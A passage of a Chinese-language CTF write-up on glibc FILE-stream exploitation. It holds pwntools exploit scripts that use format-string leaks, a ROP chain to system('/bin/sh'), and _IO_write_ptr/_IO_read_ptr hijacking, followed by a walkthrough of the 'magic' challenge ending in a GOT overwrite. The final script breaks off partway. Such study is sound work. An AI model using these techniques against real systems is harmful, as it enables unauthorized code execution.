class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">leak    = <span class="keyword">lambda</span> name,addr          :log.success(<span class="string">&#x27;&#123;&#125; = &#123;:#x&#125;&#x27;</span>.<span class="built_in">format</span>(name, addr))</span><br><span class="line">l64     = <span class="keyword">lambda</span>      :u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">l32     = <span class="keyword">lambda</span>      :u32(p.recvuntil(<span class="string">b&#x27;\xf7&#x27;</span>)[-<span class="number">4</span>:].ljust(<span class="number">4</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">echo</span>(<span class="params">c</span>):</span><br><span class="line">    sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;length:&#x27;</span>, <span class="string">b&#x27;7&#x27;</span>)</span><br><span class="line">    s(c)</span><br><span class="line"></span><br><span class="line"><span class="comment"># p = remote(&#x27;localhost&#x27;, 20000)</span></span><br><span class="line"></span><br><span class="line">echo(<span class="string">b&#x27;%p&#x27;</span>)</span><br><span class="line">ru(<span class="string">b&#x27;0x&#x27;</span>)</span><br><span class="line">sp = <span class="built_in">int</span>(r(<span class="number">12</span>), <span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">echo(<span class="string">b&#x27;%19$p&#x27;</span>)</span><br><span class="line">ru(<span class="string">b&#x27;0x&#x27;</span>)</span><br><span class="line">base = <span class="built_in">int</span>(r(<span class="number">12</span>), <span class="number">16</span>) - <span class="number">0x20830</span></span><br><span class="line"><span class="comment"># stdin_buf_base = base + 0x3c4918</span></span><br><span class="line">stdin_buf_base = base + <span class="number">0x3c3918</span></span><br><span class="line">stdin_short_buf = stdin_buf_base + <span class="number">0x4b</span></span><br><span class="line">system = base + so.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">binsh  = base + <span class="built_in">next</span>(so.search(<span class="string">b&#x27;/bin/sh&#x27;</span>))</span><br><span class="line">poprdi = base + <span class="number">0x0000000000021102</span></span><br><span class="line">fk_buf_base = sp + <span class="number">0x26f8</span></span><br><span class="line">fk_buf_end = fk_buf_base + <span class="number">0x30</span></span><br><span class="line">payload  = flat([stdin_short_buf] * <span class="number">3</span> + [fk_buf_base, fk_buf_end])</span><br><span class="line">payload_ = flat([poprdi, binsh, system])</span><br><span class="line"></span><br><span class="line">sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">sa(<span class="string">b&#x27;name:&#x27;</span>, p64(stdin_buf_base))</span><br><span class="line">echo(<span class="string">b&#x27;%16$hhn&#x27;</span>)</span><br><span class="line">sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">sa(<span class="string">b&#x27;length:&#x27;</span>, payload)</span><br><span class="line">sl(<span class="string">b&#x27;&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(payload) - <span class="number">1</span>):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&#x27;count: <span class="subst">&#123;_&#125;</span>, payload: <span class="subst">&#123;<span class="built_in">len</span>(payload)&#125;</span>&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;length:&#x27;</span>, <span class="string">b&#x27;&#x27;</span>)</span><br><span class="line">    sl(<span class="string">b&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">sl(<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line">sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">sa(<span class="string">b&#x27;length:&#x27;</span>, payload_)</span><br><span class="line">itr()</span><br></pre></td></tr></table></figure>



<h2 id="劫持-IO-write-ptr-和-IO-read-ptr-实现任意内存读写"><a href="#劫持-IO-write-ptr-和-IO-read-ptr-实现任意内存读写" class="headerlink" title="劫持 _IO_write_ptr 和 _IO_read_ptr 实现任意内存读写"></a>劫持 _IO_write_ptr 和 _IO_read_ptr 实现任意内存读写</h2><p>这两个指针分别指向该文件进行写入和读取操作时的位置 要实现任意内存读写通常就需要修改这两个指针以及对应的end指针</p>
<h3 id="任意内存读"><a href="#任意内存读" class="headerlink" title="任意内存读"></a>任意内存读</h3><p>只需要构造<code>_IO_read_ptr </code>为要读的内存的起始位置 <code>_IO_read_end</code>为要读的内存的结束位置 此时调用<code>fread()</code>时 在条件满足的情况下调用链的最后的<code>_IO_new_file_underflow ()</code>被调用 其中<code>if (fp-&gt;_IO_read_ptr &lt; fp-&gt;_IO_read_end)</code>条件为真 即缓冲区中有数据可读就会直接拷贝从<code>_IO_read_ptr</code>开始的数据至目标内存 实现了任意内存读</p>
<h3 id="任意内存写"><a href="#任意内存写" class="headerlink" title="任意内存写"></a>任意内存写</h3><p>劫持<code>_IO_write_ptr </code>的过程和上面劫持read_ptr的差不多 需要构造其指向要写入的目标并向对应的end指针写入要写入的目标结束地址 此时再调用<code>fwrite()</code>就会从目标内存拷贝数据至<code>_IO_write_ptr</code>指向的内存 需要注意的是每次写入数据后因为要调整可用的输出缓冲区大小 <code>_IO_write_ptr</code>都会加上读取到的数据量</p>
<p>同时 如果<code>_IO_read_end - _IO_read_ptr &gt; 0</code>的条件不满足 上文提到的直接返回并拷贝<code>_IO_read_ptr</code>指向的数据就不成立 而是接着执行_IO_new_file_underflow剩余的部分:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">fp-&gt;_IO_read_base = fp-&gt;_IO_read_ptr = fp-&gt;_IO_buf_base;</span><br><span class="line"> fp-&gt;_IO_read_end = fp-&gt;_IO_buf_base;</span><br><span class="line"> fp-&gt;_IO_write_base = fp-&gt;_IO_write_ptr = fp-&gt;_IO_write_end</span><br><span class="line">   = fp-&gt;_IO_buf_base;</span><br><span class="line"> count = _IO_SYSREAD (fp, fp-&gt;_IO_buf_base,</span><br><span class="line">              fp-&gt;_IO_buf_end - fp-&gt;_IO_buf_base);</span><br><span class="line"> ...</span><br><span class="line"> fp-&gt;_IO_read_end += count;</span><br></pre></td></tr></table></figure>

<p>先将所有的ptr, base, end指针都设置为<code>_IO_buf_base</code>的值 然后通过系统调用来向目标内存写入数据 若<code>fp-&gt;fileno == 0 &amp;&amp; fp-&gt;_IO_buf_base == target_addr</code> 同样可以实现任意内存写</p>
<h3 id="应用举例-1"><a href="#应用举例-1" class="headerlink" title="应用举例"></a>应用举例</h3><h4 id="攻防世界-magic"><a href="#攻防世界-magic" class="headerlink" title="[攻防世界] magic"></a>[攻防世界] magic</h4><p>checksec查出Partial RELRO且没开PIE 这题可能需要覆盖got表</p>
<p>程序自定了一个新的结构体:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">Wizard</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  _BYTE *name;</span><br><span class="line">  _BYTE desc[<span class="number">32</span>];</span><br><span class="line">  _QWORD sp;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>程序实现了几个功能 可以创建巫师:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">create_wizard</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  <span class="type">int</span> v1; <span class="comment">// [rsp+0h] [rbp-10h]</span></span><br><span class="line">  <span class="type">int</span> i; <span class="comment">// [rsp+4h] [rbp-Ch]</span></span><br><span class="line">  Wizard *v3; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v1 = <span class="number">-1</span>;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">2</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( !wizards[i] )</span><br><span class="line">    &#123;</span><br><span class="line">      v1 = i;</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( v1 == <span class="number">-1</span> )</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">&quot;Can&#x27;t create wizard!&quot;</span>);</span><br><span class="line">  v3 = (Wizard *)<span class="built_in">malloc</span>(<span class="number">0x30</span>uLL);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Give me the wizard&#x27;s name:&quot;</span>);</span><br><span class="line">  v3-&gt;name = <span class="built_in">malloc</span>(<span class="number">0x18</span>uLL);</span><br><span class="line">  my_read(v3-&gt;name, <span class="number">0x18</span>uLL);</span><br><span class="line">  <span class="built_in">strcpy</span>(v3-&gt;desc, desc_wizard);</span><br><span class="line">  v3-&gt;sp = <span class="number">800LL</span>;</span><br><span class="line">  result = v1;</span><br><span class="line">  wizards[v1] = v3;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>施法:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __fastcall <span class="title function_">my_read</span><span class="params">(<span class="type">void</span> *a1, <span class="type">size_t</span> a2)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> v3; <span class="comment">// [rsp+1Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  v3 = read(<span class="number">0</span>, a1, a2);</span><br><span class="line">  <span class="keyword">if</span> ( v3 == <span class="number">-1</span> )</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">  <span class="keyword">return</span> v3;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">wizard_spell</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> idx; <span class="comment">// [rsp+3h] [rbp-3Dh]</span></span><br><span class="line">  <span class="type">int</span> v2; <span class="comment">// [rsp+4h] [rbp-3Ch]</span></span><br><span class="line">  Wizard *v3; <span class="comment">// [rsp+8h] [rbp-38h]</span></span><br><span class="line">  _BYTE spell[<span class="number">40</span>]; <span class="comment">// [rsp+10h] [rbp-30h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v5; <span class="comment">// [rsp+38h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Who will spell:&quot;</span>);</span><br><span class="line">  idx = read_int();</span><br><span class="line">  <span class="keyword">if</span> ( !wizards[idx] || idx &gt; <span class="number">2</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;evil wizard!&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  v3 = wizards[idx];</span><br><span class="line">  <span class="keyword">if</span> ( (__int64)v3-&gt;sp &gt; <span class="number">0</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( (__int64)v3-&gt;sp &lt;= <span class="number">49</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;fail!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;Spell name:&quot;</span>);</span><br><span class="line">      v2 = my_read(spell, <span class="number">0x20</span>uLL);</span><br><span class="line">      write_spell(spell, v2);</span><br><span class="line">      read_spell();</span><br><span class="line">      v3-&gt;sp -= <span class="number">50LL</span>;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;success!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;muggle!&quot;</span>);</span><br><span class="line">    <span class="built_in">strcpy</span>(v3-&gt;desc, desc_muggle);</span><br><span class="line">    --left_wizard;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v5;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">size_t</span> __fastcall <span class="title function_">write_spell</span><span class="params">(<span class="type">const</span> <span class="type">void</span> *spell, <span class="type">size_t</span> len)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">return</span> fwrite(spell, len, <span class="number">1uLL</span>, log_file);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">read_spell</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  _BYTE ptr[<span class="number">40</span>]; <span class="comment">// [rsp+0h] [rbp-30h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v2; <span class="comment">// [rsp+28h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  fread(ptr, <span class="number">1uLL</span>, <span class="number">0x20</span>uLL, log_file);</span><br><span class="line">  write(<span class="number">1</span>, ptr, <span class="number">0x20</span>uLL);</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>每次施法先检测sp是否足够50 并在施法结束后扣除50sp </p>
<p>其中<code>log_file</code>是通过fopen获得的<code>&#39;/dev/urandom&#39;</code>文件流:</p>
<p><img src="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-202809.png" alt="image-20250311202802443"></p>
<p>那么施法的逻辑就是用户先选择一个巫师 然后输入咒语 根据读取到用户输入长度来从随机字节流中读取相同长度来输出乱码 漏洞也很明显 程序让用户输入下标但对下标的合法性检测不足 当输入负数下标时存在越界</p>
<p>再来看看全局变量的布局:</p>
<p><img src="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-203118.png" alt="image-20250311203118438"></p>
<p>当输入负数下标时可以通过施法最后扣除sp的功能将结构体偏移为0x28的字段 -50 可以用来修改log_gile, stdin, stdout 3个文件描述符中的<code>._IO_write_ptr</code>字段 由于这题用到的高级输入函数比较少 而对log_file的操作比较多 所以选择控制log_file</p>
<p>思路也比较清晰 任意地址读泄露出libc基址 然后任意地址写用system的地址覆盖fwrite的 这样在一次施法中咒语为<code>&#39;/bin/sh\x00&#39;</code>时它就会以第一个参数的形态出击system</p>
<h5 id="任意内存读泄露libc和heap基址"><a href="#任意内存读泄露libc和heap基址" class="headerlink" title="任意内存读泄露libc和heap基址"></a>任意内存读泄露libc和heap基址</h5><p>通过fopen打开的文件流结构体会被分配到堆上 而接下来从随机字节流中读取数据时这些随机字节流也是位于堆上的 这意味着log_file的所有缓冲区指针都会指向一个位于自身结构体更大的内存 也就是可以通过上文对<code>_IO_write_ptr</code>的操作 最终使它指向自身的<code>_IO_read_ptr</code> 再将一个got表中的地址写入<code>_IO_read_ptr</code> 此时再调用<code>fread()</code>就能将libc地址读入到目标内存中了 在<code>read_spell()</code>中读出的内容会立刻被输出 达成了泄露libc的目的</p>
<p>需要注意的是使用fopen获取的文件流在为经过任何调用时只会初始化其中的<code>.flag</code>字段 而施法要求sp大于49 显然是无法成立的 所以需要先创建一个巫师并进行施法以初始化各个字段</p>
<p>另外 在做题的过程中想起来上面观察内存分布时<code>stdin</code>就在log_file的正上方 将此处的地址写入<code>_IO_read_ptr</code> 而一次最多可以泄露0x20的功能刚好可以泄露出libc以及heap的基址 没必要用got表泄露libc</p>
<p>这一步的难点在于如何调整<code>_IO_write_ptr</code> 上文说过向缓冲区中写入数据后会增加<code>_IO_write_ptr</code>的值 也就是一次可以减少<code>_IO_write_ptr</code>的值为[50 - 0x20, 50 - 1] 这个值还是基于写入的数据量的 另外 由于还未泄露出heap基址 写入<code>_IO_write_ptr</code>的值还不能覆盖掉结构体中重要的值 所以每步要减少的值需要慎重考虑 只能调试出合适的路线来让<code>_IO_write_ptr</code>减至<code>_IO_read_ptr</code>上方的内存 而且也不能太上方 因为<code>heap</code>段基址是随机的 上方物理连续内存还没有被映射到虚拟内存:</p>
<p><img src="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-211259.png" alt="image-20250311211259035"></p>
<p>最后调试得到的路线:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">wizard_spell</span>(<span class="params">idx, data</span>):</span><br><span class="line">    sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    sla(<span class="string">b&#x27;spell:&#x27;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line">    sa(<span class="string">b&#x27;:&#x27;</span>, data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create_wizard</span>(<span class="params">name</span>):</span><br><span class="line">    sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    sa(<span class="string">b&#x27;name:&#x27;</span>, name)</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&#x27;localhost&#x27;</span>, <span class="number">20000</span>)</span><br><span class="line">create_wizard(<span class="string">b&#x27;11111111&#x27;</span>)</span><br><span class="line">wizard_spell(<span class="number">0</span>, <span class="string">b&#x27;1&#x27;</span> * <span class="number">0x20</span>)</span><br><span class="line"><span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">11</span>):</span><br><span class="line">    wizard_spell(-<span class="number">2</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">wizard_spell(-<span class="number">2</span>, <span class="string">b&#x27;\x00\x00&#x27;</span>)</span><br><span class="line">wizard_spell(-<span class="number">2</span>, <span class="string">b&#x27;\x00&#x27;</span> * <span class="number">20</span>)</span><br><span class="line">wizard_spell(-<span class="number">2</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line">wizard_spell(<span class="number">0</span>, <span class="string">b&#x27;\x00&#x27;</span> * <span class="number">3</span> + p64(<span class="number">0x231</span>) + p64(<span class="number">0xfbad24a8</span>))</span><br><span class="line">wizard_spell(<span class="number">0</span>, p64(<span class="number">0x6020D0</span>) + p64(<span class="number">0x602120</span>))</span><br><span class="line">leak = r(<span class="number">0x20</span>)</span><br><span class="line">leak = [leak[<span class="number">8</span> * i : <span class="number">8</span> * (i + <span class="number">1</span>)] <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>)]</span><br><span class="line">leak = [u64(i) <span class="keyword">for</span> i <span class="keyword">in</span> leak]</span><br><span class="line">libc_base = leak[<span class="number">0</span>] - so.symbols[<span class="string">&#x27;_IO_2_1_stdin_&#x27;</span>]</span><br><span class="line">heap_base = leak[<span class="number">2</span>] - <span class="number">0x10</span></span><br><span class="line">log.success(<span class="string">&#x27;libc_base = %#x&#x27;</span> % libc_base)</span><br><span class="line">log.success(<span class="string">&#x27;heap_base = %#x&#x27;</span> % heap_base)</span><br></pre></td></tr></table></figure>

<h5 id="任意内存写覆盖got"><a href="#任意内存写覆盖got" class="headerlink" title="任意内存写覆盖got"></a>任意内存写覆盖got</h5><p>完成第一个任务后结构体中的<code>_IO_write_ptr</code>此时已经指向了<code>._IO_read_base</code> 而现在已经泄露出堆基址 所以可以放心覆盖结构体中的内容</p>
<p>接下来就用对应字段原本的值来覆盖无关紧要的字段 最重要的是需要覆盖写入缓冲区相关的4个字段:</p>
<p><img src="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-212416.png" alt="image-20250311212416820"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">system = libc_base + so.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">ptr = heap_base + <span class="number">0x2a0</span></span><br><span class="line">wizard_spell(<span class="number">0</span>, flat(ptr, ptr))</span><br><span class="line">wizard_spell(<span class="number">0</span>, flat(elf.got[<span class="string">&#x27;fwrite&#x27;</span>] + <span class="number">0x20</span>, elf.got[<span class="string">&#x27;fwrite&#x27;</span>] + <span class="number">0x28</span>, elf.got[<span class="string">&#x27;fwrite&#x27;</span>] + <span class="number">0x20</span>, elf.got[<span class="string">&#x27;fwrite&#x27;</span>] + <span class="number">0x28</span>))</span><br></pre></td></tr></table></figure>

<p>为什么要先写入两个指针然后再写入目标的4个指针?</p>
<p>先看看覆盖了前两个指针后read相关字段指向的地址:</p>
<p><img src="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-212012.png" alt="image-20250311212011939"></p>
<p>现在ptr和end的插值为0x10 如上文中对<code>_IO_read_ptr</code>的介绍 若不满足读取缓冲区还有数据的情况 就会进入设置结构体中所有缓冲区指针为<code>_IO_buf_base</code>的分支 然后进行系统调用读取数据</p>
<p>这意味着如果第一次写入4个指针的话在下一次读入数据后 <code>_IO_write_ptr</code>就会被设置成<code>_IO_buf_base</code> 一切回到起点 需要再次调整<code>_IO_write_ptr</code>的值 显然这是不被希望的</p>
<p>完成fwrite对字段的调整后:</p>
<p><img src="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-213332.png" alt="image-20250311213332131"></p>
<p>此时才需要fread进入设置指针那条分支来让<code>_IO_write_ptr</code>被设置成目标值 执行fread后:</p>
<p><img src="https://cdn.jsdelivr.net/gh/1K0CT/BlogImage@main/img/2025%2F03%2F11%2F20250311-213537.png" alt="image-20250311213537527"></p>
<p>然后要做的就是继续调整<code>_IO_write_ptr</code>直到能够覆盖fwrite的got表值 需要注意的是此后每次执行fread后<code>_IO_write_ptr</code>都会因为read ptr和end相等而被设置为buf base 所以需要调整完write ptr的值后立刻写入got表</p>
<p>完整exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./magic&#x27;</span>)</span><br><span class="line">so = ELF(<span class="string">&#x27;/home/i/PC_File/libs/2.23-0ubuntu3_amd64/libc-2.23.so&#x27;</span>)</span><br><span class="line"><span class="comment"># so = ELF(&#x27;./libc6_2.23-0ubuntu10_amd64.so&#x27;)</span></span><br><span class="line">s       = <span class="keyword">lambda</span> data               :p.send(data)</span><br><span class="line">sa      = <span class="keyword">lambda</span> delim,data         :p.sendafter(delim, data)</span><br><span class="line">sl      = <span class="keyword">lambda</span> data               :p.sendline(data)</span><br><span class="line">sla     = <span class="keyword">lambda</span> delim,data         :p.sendlineafter(delim, data)</span><br><span class="line">r       = <span class="keyword">lambda</span> num=<span class="number">4096</span>           :p.recv(num)</span><br><span class="line">ru      = <span class="keyword">lambda</span> delims, drop=<span class="literal">True</span>  :p.recvuntil(delims, drop)</span><br><span class="line">itr     = <span class="keyword">lambda</span>                    :p.interactive()</span><br><span class="line">uu32    = <span class="keyword">lambda</span> data               :u32(data.ljust(<span class="number">4</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">uu64    = <span class="keyword">lambda</span> data               :u64(data.ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">leak    = <span class="keyword">lambda</span> name,addr          :log.success(<span class="string">&#x27;&#123;&#125; = &#123;:#x&#125;&#x27;</span>.<span class="built_in">format</span>(name, addr))</span><br><span class="line">l64     = <span class="keyword">lambda</span>      :u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">l32     = <span class="keyword">lambda</span>      :u32(p.recvuntil(<span class="string">b&#x27;\xf7&#x27;</span>)[-<span class="number">4</span>:].ljust(<span class="number">4</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">wizard_spell</span>(<span class="params">idx, data</span>):</span><br><span class="line">    sla(<span class="string">b&#x27;choice&gt;&gt; &#x27;</span>, <span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    sla(<span 